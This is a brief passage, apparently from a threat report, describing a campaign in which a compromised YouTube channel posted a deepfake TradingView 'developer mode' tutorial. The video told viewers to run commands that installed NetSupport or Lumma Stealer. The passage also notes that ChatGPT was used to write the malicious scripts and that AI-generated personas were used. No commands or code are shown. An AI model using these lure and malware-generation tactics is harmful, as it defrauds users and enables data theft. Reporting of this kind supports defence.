Users of a compromised YouTube channel (over 110,000 subscribers). The attack also leveraged…

Attackers used a deepfake video disguised as a tutorial for unlocking TradingView's developer mode. The video instructed users to execute commands installing malware (NetSupport or Lumma Stealer), granting attackers remote access and enabling data theft. AI-generated personas were used across multiple accounts, with engagement metrics manipulated to enhance credibility. AI tools like ChatGPT were used to create malicious scripts, with attackers adapting C&C domains and using Pasteco to distribute them. The goal was data exfiltration and system compromise, using cryptocurrency as bait.